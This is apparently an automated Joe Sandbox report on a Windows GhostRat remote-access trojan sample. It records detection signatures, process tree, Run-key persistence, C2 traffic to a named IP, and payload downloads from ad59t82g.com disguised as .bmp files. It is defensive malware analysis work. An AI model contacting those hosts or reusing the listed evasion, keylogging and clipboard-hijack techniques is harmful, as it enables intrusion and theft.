Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
N6xnw0iEGs.exe

Overview

General Information

Sample name:N6xnw0iEGs.exe
renamed because original name is a hash value
Original sample name:c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7.exe
Analysis ID:1511252
MD5:8f6f306ba501a7e435db720bb97cb1e4
SHA1:66de656287a3bff5a7bf89f9a0972d679e3afe3f
SHA256:c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7
Tags:ad59t82g-comexe
Infos:

Detection

GhostRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GhostRat
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Contains functionalty to change the wallpaper
Drops password protected ZIP file
Found API chain indicative of debugger detection
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to access browser extension known for cryptocurrency wallets
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to clear windows event logs (to hide its activities)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a global mouse hook
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • N6xnw0iEGs.exe (PID: 7572 cmdline: "C:\Users\user\Desktop\N6xnw0iEGs.exe" MD5: 8F6F306BA501A7E435DB720BB97CB1E4)
    • Fj0RhXL.exe (PID: 5408 cmdline: "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • Fj0RhXL.exe (PID: 7316 cmdline: "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • Fj0RhXL.exe (PID: 1432 cmdline: "C:\Program Files (x86)\IemFNe\Fj0RhXL.exe" MD5: C8E8EEAF5464AF1A188B3DC12C890813)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000003.3557268129.0000000004FD5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
    00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
      00000006.00000002.3622789502.0000000003BF0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
        00000006.00000003.3557221510.0000000004FD5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
          00000006.00000003.3377534559.0000000004FD5000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GhostRatYara detected GhostRatJoe Security
            Click to see the 10 entries
            SourceRuleDescriptionAuthorStrings
            6.3.Fj0RhXL.exe.4fd5a53.4.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
              6.3.Fj0RhXL.exe.4fd5a53.5.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                6.2.Fj0RhXL.exe.3d80000.5.raw.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                  6.3.Fj0RhXL.exe.13a300b.1.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                    6.2.Fj0RhXL.exe.3bf05bf.4.unpackJoeSecurity_GhostRatYara detected GhostRatJoe Security
                      Click to see the 23 entries

                      System Summary

                      barindex
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\IemFNe\Fj0RhXL.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\N6xnw0iEGs.exe, ProcessId: 7572, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WINDOWS
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-14T18:31:39.230500+020020528751A Network Trojan was detected192.168.2.44974045.201.245.15380TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-14T18:31:06.970884+020028033043Unknown Traffic192.168.2.449737172.67.203.19580TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Program Files (x86)\IemFNe\t4d.tmpAvira: detection malicious, Label: DR/FakePic.Gen
                      Source: N6xnw0iEGs.exeReversingLabs: Detection: 21%
                      Source: N6xnw0iEGs.exeVirustotal: Detection: 29%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                      Source: N6xnw0iEGs.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
                      Source: Binary string: J:\work\res_checker\netdia\Release\NetDiagnotor.pdb source: N6xnw0iEGs.exe
                      Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSVCP140.dll.0.dr
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: z:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: x:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: v:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: t:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: r:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: p:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: n:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: l:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: j:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: h:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: f:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: b:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: y:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: w:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: u:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: s:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: q:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: o:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: m:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: k:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: i:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: g:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: e:Jump to behavior
                      Source: C:\Users\user\Desktop\N6xnw0iEGs.exeFile opened: c:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeFile opened: [:Jump to behavior
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D895F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_03D895F0

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2052875 - Severity 1 - ET MALWARE Anonymous RAT CnC Checkin : 192.168.2.4:49740 -> 45.201.245.153:80
                      Source: global trafficHTTP traffic detected: GET /1/tant.bmp HTTP/1.1Host: ad59t82g.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /1/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: Joe Sandbox ViewASN Name: KINGCORP-KHOpenNetISPCambodiaKH KINGCORP-KHOpenNetISPCambodiaKH
                      Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49737 -> 172.67.203.195:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.201.245.153
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_02F02FA0 recv,select,recv,6_2_02F02FA0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Sep 2024 16:31:07 GMTContent-Type: image/x-ms-bmpContent-Length: 6443425Connection: keep-aliveLast-Modified: Thu, 08 Aug 2024 15:32:21 GMTETag: "66b4e505-6251a1"Cache-Control: max-age=14400CF-Cache-Status: HITAge: 0Accept-Ranges: bytesReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cE0CrtBjdkE7Lx1GVUwOsKz4LZG5svqBTJQ9CUSZ3tE1n8BLAW%2F9UIYH14YNCLQkmPr7dU2MX9xNOibSKDgWkdriiD3Zhlj61JkreOyxtP4sNZFCQ2EUwMLCSK83jEg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c31c3fa9aab43d7-EWRalt-svc: h3=":443"; ma=86400Data Raw: 50 4b 03 04 14 00 00 00 00 00 52 09 02 59 00 00 00 00 00 00 00 00 00 00 00 00 05 00 11 00 74 65 78 74 2f 55 54 0d 00 07 f1 31 ac 66 f1 31 ac 66 f1 31 ac 66 50 4b 03 04 14 00 09 00 08 00 ae 88 37 58 00 00 00 00 00 00 00 00 78 a9 06 00 11 00 11 00 74 65 78 74 2f 4d 53 56 43 50 31 34 30 2e 64 6c 6c 55 54 0d 00 07 d3 f1 af 65 6a c1 ab 66 32 4d 82 66 87 7a eb 30 49 5c 70 71 cf 9f 0b 7f 37 1a ef fe ec 4e 99 14 e9 79 0c eb 41 b9 e8 f1 0c 4c 80 3a 7f 76 93 46 46 e8 65 7d bc 46 e7 22 b0 cc d0 5f 0c fe e5 9a c6 07 68 49 cf 67 8c de f1 91 0a 4d 5f 96 fa d9 d6 82 da 5d 83 1e 78 91 03 68 d0 5c f3 7f be 92 78 68 7f 9b 82 3d 58 0a 03 a3 ca 52 a9 20 ad ce 0c 1c 17 57 32 4f 23 2d bd 75 0e cf 2d 73 5a f1 a5 25 a2 53 54 c7 df 3d 96 7b f5 d6 b7 e4 a5 b1 33 57 3e 91 c8 b1 9f 68 0b 2f d7 28 a9 80 e2 6e 4c cc 82 c2 26 fe 2b 7e ce 5e 42 59 1b b0 3c 97 03 3a bf 54 e9 ce 6b d0 11 f6 8c a1 96 6a 71 dd 5b a0 e2 f0 6e 1c 54 d9 8d e7 7b 68 d7 cb 0f 8d a0 bc 2f 63 1e dc b5 69 41 6a 0d fd 2b c8 88 9c 7c 92 ea 7c bc 78 5c b1 3a 4c 96 53 a8 93 1a 43 8a 40 72 c9 cd 4d f3 75 0b d3 e0 d6 60 25 ae d3 66 4a 4b 5d b6 5e 17 3b 24 29 1b a7 07 28 1d 48 ce 8a 24 dd e5 0f 57 31 3b 63 bc e1 b9 39 3b 66 4c 46 9f 14 f3 c4 02 68 95 c3 21 3d 7c d0 7a 12 01 3c 08 32 de 1b 41 20 0a ef 8d 8e 3c cb 3d 54 8e 28 0e 74 2d a5 bb e4 c7 6a f7 4b 3c 19 7a 3e b3 55 75 93 98 a4 85 fc 3e 61 cb 06 22 80 2d 2c 37 b8 2a 5c b0 51 a6 6b 96 fb ee 27 23 f4 d0 04 a5 0c 50 95 84 0f 9b 47 8f 5b 48 3b 2a bb f4 f8 7d 94 68 ed 84 fa fd 02 9b 9e ae f0 7d 19 69 b4 c0 78 83 f0 ef 95 a1 21 73 56 4e d7 8b 38 9a ed e1 e8 8f 47 a6 26 5f 23 ea 1f c9 5d 4a c2 09 00 e3 5f 67 5d 15 a9 47 b3 f4 9d ca 98 2c 66 e6 Data Ascii: PKRYtext/UT1f1f1fPK7Xxtext/MSVCP140.dllUTejf2Mfz0I\pq7NyAL:vFFe}F"_hIgM_]xh\xh=XR W2O#-u-sZ%ST={3W>h/(nL&+~^BY<:Tkjq[nT{h/ciAj+||x\:LSC@rMu`%fJK]^;$)(H$W1;c9;fLFh!=|z<2A <=T(t-jK<z>Uu>a"-,7*\Qk'#PG[H;*}h}ix!sVN8G&_#]J_g]G,f
                      Source: global trafficHTTP traffic detected: GET /1/tant.bmp HTTP/1.1Host: ad59t82g.comCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /1/text.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/d.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficHTTP traffic detected: GET /1/t1.bmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ad59t82g.com
                      Source: global trafficDNS traffic detected: DNS query: ad59t82g.com
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/d.bmpWhttp://ad59t82g.com/1/t1.bmp
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/t1.bmpp%s.exet5d.tmpt3d.tmpt4d.tmp%s%s.exeC:
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2991068983.000000000244D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/tant.bmp
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2987931723.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/tant.bmpwininetmsvcrt
                      Source: N6xnw0iEGs.exe, 00000000.00000002.2992400637.00000000053E9000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ad59t82g.com/1/text.bmpC:
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://code.jquery.com/jquery-1.10.1.min.js
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://tianyu.gm.163.com/submit_sub.html?paper_id=2481
                      Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://tianyu.gm.163.com/user_help.html?paper_id=2017#
                      Source: N6xnw0iEGs.exe, 00000000.00000000.1747294467.000000000217E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://tianyu.gm.163.com/user_help.html?paper_id=3103
                      Source: libcef.dll.0.drString found in binary or memory: http://www.astro.com/swisseph.
                      Source: Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htm
                      Source: N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: http://www.astrolog.org/astrolog.htmMain
                      Source: Fj0RhXL.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: libcef.dll.0.drString found in binary or memory: http://www.gnu.org
                      Source: Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.html
                      Source: N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://data.iana.org/time-zones/tz-link.htmlPostScript
                      Source: Fj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.ubi.com/
                      Source: Fj0RhXL.exe, 00000006.00000002.3620905823.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000007.00000002.3078134311.00000000007F3000.00000002.00000001.01000000.00000005.sdmp, Fj0RhXL.exe, 00000008.00000002.3157887765.00000000007F3000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired
                      Source: Fj0RhXL.exe, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/
                      Source: N6xnw0iEGs.exe, 00000000.00000003.2837571860.000000001003B000.00000004.00000020.00020000.00000000.sdmp, N6xnw0iEGs.exe, 00000000.00000003.2956722511.00000000056D2000.00000004.00000020.00020000.00000000.sdmp, Fj0RhXL.exe, 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000007.00000002.3079815131.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, Fj0RhXL.exe, 00000008.00000002.3158950431.000000006C3FD000.00000002.00000001.01000000.00000006.sdmp, libcef.dll.0.drString found in binary or memory: https://www.geonames.org/Timezone

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: [esc]6_2_03D993F0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: [esc]6_2_03D993F0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: [esc]6_2_03D993F0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: [esc]6_2_03D993F0
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D86770 CreateMutexW,CreateMutexW,GetLastError,GetLastError,Sleep,Sleep,CreateMutexW,GetLastError,lstrlenW,lstrcmpW,_memset,lstrlenW,lstrcmpW,Sleep,GetModuleHandleW,GetConsoleWindow,Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,6_2_03D86770
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D86770 CreateMutexW,CreateMutexW,GetLastError,GetLastError,Sleep,Sleep,CreateMutexW,GetLastError,lstrlenW,lstrcmpW,_memset,lstrlenW,lstrcmpW,Sleep,GetModuleHandleW,GetConsoleWindow,Sleep,CreateMutexW,GetLastError,_memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,_memmove,_memmove,_memmove,GetDesktopWindow,OpenClipboard,GetClipboardData,GlobalSize,GlobalLock,GlobalUnlock,CloseClipboard,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,6_2_03D86770
                      Source: C:\Program Files (x86)\IemFNe\Fj0RhXL.exeCode function: 6_2_03D871C6 _memset,lstrlenW,lstrcmpW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,_memset,RegQueryValueExW,std::locale::_Init,std::_Lockit::_Lockit,_memmove,GetDesktopWindow,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,6_2_03D871C6
